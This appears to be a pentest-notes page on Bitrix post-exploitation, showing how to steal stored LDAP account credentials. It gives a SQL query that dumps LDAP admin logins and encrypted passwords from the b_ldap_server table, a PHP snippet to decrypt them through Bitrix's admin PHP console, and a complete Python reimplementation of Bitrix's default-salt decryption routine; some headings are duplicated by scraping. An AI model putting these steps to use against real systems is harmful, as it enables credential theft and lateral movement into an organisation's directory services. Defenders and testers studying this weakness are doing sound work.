Bitrix
Postexploit
Get ldap account
Take encrypted value
on php exec from bitrix admin (auto way)
Manual decrypt way:
Last updated
Take encrypted value
on php exec from bitrix admin (auto way)
Manual decrypt way:
Last updated
select code,server,admin_login,admin_password from b_ldap_server;use Bitrix\Ldap\EncryptionType;
use Bitrix\Ldap\Internal\Security\Encryption;
$result=Encryption::decrypt("MYSUPERBASE64PASSHERE=");
var_dump($result);import hashlib
import base64
class BitrixEncryption:
@staticmethod
def bin_md5(val):
if isinstance(val, str):
val = val.encode('utf-8')
return bytes.fromhex(hashlib.md5(val).hexdigest())
@staticmethod
def byte_xor(a, b, length):
result = bytearray()
for i in range(length):
if i < len(a) and i < len(b):
result.append(a[i] ^ b[i])
else:
break
return bytes(result)
@staticmethod
def decrypt(encrypted_str, salt=None):
if salt is None:
#default value
salt = 'ldap'
key = salt
key1 = BitrixEncryption.bin_md5(key)
try:
encrypted_data = base64.b64decode(encrypted_str)
except Exception as e:
raise ValueError(f"err dec base64: {e}")
result = b''
while encrypted_data:
block = encrypted_data[:16]
encrypted_data = encrypted_data[16:]
decrypted_block = BitrixEncryption.byte_xor(block, key1, len(block))
result += decrypted_block
try:
key1 = BitrixEncryption.bin_md5(
(key + key1.decode('latin-1') + decrypted_block.decode('latin-1')).encode('latin-1')
)
except UnicodeDecodeError:
key1 = BitrixEncryption.bin_md5(key.encode('utf-8') + key1 + decrypted_block)
try:
return result.decode('utf-8')
except UnicodeDecodeError:
return result.decode('latin-1', errors='replace')
# Example usage:
#print(BitrixEncryption.decrypt("MYBASE64STRING", "ldap"))